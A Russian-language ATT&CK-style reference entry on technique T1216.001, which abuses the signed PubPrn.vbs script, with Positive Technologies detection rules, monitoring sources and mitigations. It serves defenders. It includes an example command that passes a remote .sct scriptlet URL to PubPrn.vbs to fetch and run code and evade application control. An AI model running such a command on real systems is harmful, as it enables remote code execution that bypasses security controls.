T1216.001: Сценарий PubPrn
Злоумышленники могут использовать сценарии PubPrn для удаленного выполнения вредоносных файлов. PubPrn.vbs — это сценарий, написанный на языке Visual Basic, который публикует принтер в доменных службах Active Directory. Сценарий может быть подписан сертификатом Microsoft и, как правило, выполняется через командную оболочку Windows с помощью программы Cscript.exe. Например, следующий код публикует принтер в указанном домене: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.
Злоумышленники могут использовать сценарий PubPrn для выполнения полезных нагрузок, размещенных на удаленных сайтах. Для этого они могут указать во втором параметре script: ссылку на файл сценария с расширением .sct, расположенный на удаленном сервере. Пример команды: pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. Такой подход позволяет злоумышленникам обойти ограничения, связанные с проверкой подписи, и механизмы контроля приложений, которые не отслеживают неправомерное использование этого сценария.
В последних версиях Windows (начиная с 10) используется обновленный сценарий PubPrn.vbs, который предотвращает выполнение кода, размещенного на удаленном ресурсе. В этом сценарии во втором параметре можно указать только протокол LDAP://, по которому, в отличие от script:, нельзя подключиться к удаленному ресурсу с кодом по протоколам HTTP или HTTPS.
Какие продукты Positive Technologies покрывают технику
Как обнаружить
PT NAD при помощи детектирующих правил и фильтров способен обнаруживать артефакты загрузки и удаленного выполнения вредоносных файлов путем злоупотребления функциональностью сценария PubPrn.vbs.
Пример правил обнаружения PT NAD
- ATTACK [PTsecurity] WScript.Shell Run HTML Code Execution Attempt (sid 10003456)
Примеры фильтров PT NAD
- files.filename ~ "*.sct"
Способы обнаружения
| ID | DS0012 | Источник и компонент данных | Сценарий: Выполнение сценария | Описание | Отслеживайте попытки включить поддержку сценариев в системе и рассматривайте их как подозрительные. Если использование сценариев в системе допустимо, но не является типичным, их выполнение вне цикла обновлений или других административных задач должно рассматриваться как подозрительное. По возможности сохраняйте сценарии, записанные в файловой системе, для последующего анализа действий и целей злоумышленников. |
|---|
| ID | DS0017 | Источник и компонент данных | Команда: Выполнение команд | Описание | Отслеживайте выполнение команд с аргументами, которые могут использоваться для запуска таких сценариев, как PubPrn.vbs, способных обеспечивать выполнение вредоносных файлов. |
|---|
| ID | DS0009 | Источник и компонент данных | Процесс: Создание процесса | Описание | Отслеживайте использование сценариев, например процессы сервера сценариев |
|---|
Меры противодействия
| ID | M1038 | Название | Защита от выполнения | Описание | Некоторые подписанные сценарии, которые могут использоваться для выполнения других программ, могут быть не нужны в конкретной среде. Используйте контроль приложений, настроенный на блокировку выполнения этих сценариев, если они не требуются для данной системы или сети, чтобы предотвратить потенциальное использование злоумышленниками. |
|---|
| ID | M1040 | Название | Предотвращение некорректного поведения | Описание | В Windows 10 обновите политики управления приложениями в Защитнике Windows, включив в них правила, блокирующие старые уязвимые версии PubPrn. |
|---|